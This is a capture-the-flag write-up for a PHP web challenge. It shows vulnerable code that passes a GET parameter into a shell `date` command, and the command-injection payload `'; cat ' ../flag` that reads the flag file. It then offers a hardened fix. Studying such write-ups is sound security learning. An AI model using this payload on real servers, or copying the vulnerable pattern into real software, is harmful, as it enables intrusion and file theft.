# Time

Challenge: Time

Category: Web

Get the current date and time, anytime, anywhere!

<figure><img src="https://382757542-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FfAxmqRz869b0dQQ6DjHW%2Fuploads%2FvDArTJg1qn4t2vmg8rhP%2F2.png?alt=media&#x26;token=b532f4c5-52e0-473d-a089-66b4154ce5c7" alt=""><figcaption></figcaption></figure>

I noticed that it changed when I clicked the "What's the date?" menu.

<figure><img src="https://382757542-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FfAxmqRz869b0dQQ6DjHW%2Fuploads%2FKxwOAg9kkXBGJ3mCAUj5%2F3.png?alt=media&#x26;token=94e3409e-8d5a-4980-840b-72ff3f4a80ae" alt=""><figcaption></figcaption></figure>

Since it's a web challenge, I thought of a possible code injection vulnerability.

They provided the source code:

```
web_time
├── build_docker.sh
├── challenge
│   ├── assets
│   │   └── favicon.png
│   ├── controllers
│   │   └── TimeController.php
│   ├── index.php
│   ├── models
│   │   └── TimeModel.php
│   ├── Router.php
│   ├── static
│   │   └── main.css
│   └── views
│       └── index.php
├── config
│   ├── fpm.conf
│   ├── nginx.conf
│   └── supervisord.conf
├── Dockerfile
└── flag
```

First, I checked the directory structure. It's MVC, since we have controllers, models, and views folders. Second, I checked the Dockerfile, built it on my machine, and examined which Docker image and command are used and where the flag is located.

```
FROM debian:buster-slim

# Setup user
RUN useradd www

# Install system packages
RUN apt-get update && apt-get install -y supervisor nginx lsb-release wget

# Add repos
RUN wget -O /etc/apt/trusted.gpg.d/php.gpg https://packages.sury.org/php/apt.gpg
RUN echo "deb https://packages.sury.org/php/ $(lsb_release -sc) main" | tee /etc/apt/sources.list.d/php.list

# Install PHP dependencies
RUN apt update && apt install -y php7.4-fpm

# Configure php-fpm and nginx
COPY config/fpm.conf /etc/php/7.4/fpm/php-fpm.conf
COPY config/supervisord.conf /etc/supervisord.conf
COPY config/nginx.conf /etc/nginx/nginx.conf

# Copy challenge files
COPY challenge /www

# Setup permissions
RUN chown -R www:www /www /var/lib/nginx

# Copy flag
COPY flag /flag

# Expose the port nginx is listening on
EXPOSE 80

# Populate database and start supervisord
CMD /usr/bin/supervisord -c /etc/supervisord.conf
```

I found that the flag is located at the `/flag` path, but they provided a sample flag inside their source code:

<figure><img src="https://382757542-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FfAxmqRz869b0dQQ6DjHW%2Fuploads%2FVERO5W1T1OuvesnFfgaO%2F4.png?alt=media&#x26;token=4fbb0b13-620e-4209-a5a8-92aacf3a20b7" alt=""><figcaption></figcaption></figure>

Next, I checked `controllers/TimeController.php`:

```php
<?php
class TimeController
{
    public function index($router)
    {
        $format = isset($_GET['format']) ? $_GET['format'] : '%H:%M:%S';
        $time = new TimeModel($format);
        return $router->view('index', ['time' => $time->getTime()]);
    }
}
```

This indicated that the controller creates a `TimeModel` object, so I checked `models/TimeModel.php`:

```php
<?php
class TimeModel
{
    public function __construct($format)
    {
        $this->command = "date '+" . $format . "' 2>&1";
    }

    public function getTime()
    {
        $time = exec($this->command);
        $res  = isset($time) ? $time : '?';
        return $res;
    }
}
```

I found `$this->command = "date '+" . $format . "' 2>&1";`

This means that we need to inject a command (a command injection vulnerability). We can break out of the string by adding a single quote (') and a semicolon (;).

I made a simple request using Burp Suite:

`/?format='; cat ' ../flag`

<figure><img src="https://382757542-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FfAxmqRz869b0dQQ6DjHW%2Fuploads%2FYbAabhRU5NrByFYJz41R%2F5.png?alt=media&#x26;token=f7e7f971-b2ce-49b7-b4b5-1ece53e06762" alt=""><figcaption></figcaption></figure>

Gotcha, I found a flag!!!
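
For the defensive side of the `TimeModel` code above, here is one way to close the injection. This is an added example, not part of the challenge source; `SafeTimeModel`, `ALLOWED_FORMAT` and `command()` are hypothetical names, and the allowlist is an assumption about which formats the page needs.

```php
<?php
// Added example: hardened replacement for the TimeModel shown above.
// SafeTimeModel, ALLOWED_FORMAT and command() are hypothetical names.
class SafeTimeModel
{
    // Allowlist: strftime-style directives (%H, %M, ...) plus a few literal separators.
    private const ALLOWED_FORMAT = '/\A(?:%[a-zA-Z%]|[0-9A-Za-z :\/.,-])*\z/';

    private $format;

    public function __construct($format)
    {
        if (!is_string($format) || strlen($format) > 64
            || !preg_match(self::ALLOWED_FORMAT, $format)) {
            throw new InvalidArgumentException('unsupported time format');
        }
        $this->format = $format;
    }

    // Command string that would be run; exposed so the quoting can be inspected.
    public function command()
    {
        // escapeshellarg() wraps the value in single quotes and escapes embedded ones,
        // so the format stays one argument to date even if the allowlist is loosened.
        return 'date ' . escapeshellarg('+' . $this->format) . ' 2>&1';
    }

    public function getTime()
    {
        $time = exec($this->command(), $output, $status);
        return ($status === 0 && $time !== false) ? $time : '?';
    }
}

// Constructed inputs: the default format from TimeController and the payload from this writeup.
$inputs = ['%H:%M:%S', "'; cat ' ../flag"];
foreach ($inputs as $input) {
    try {
        $model = new SafeTimeModel($input);
        echo $model->command(), ' => ', $model->getTime(), PHP_EOL;
    } catch (InvalidArgumentException $e) {
        echo 'rejected: ', var_export($input, true), PHP_EOL;
        // What escapeshellarg() alone would produce for the same input:
        echo '  quoted: date ', escapeshellarg('+' . $input), PHP_EOL;
    }
}
```

Where the shell is not needed at all, formatting the time with PHP's own date functions removes the `exec()` call and the injection surface with it.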
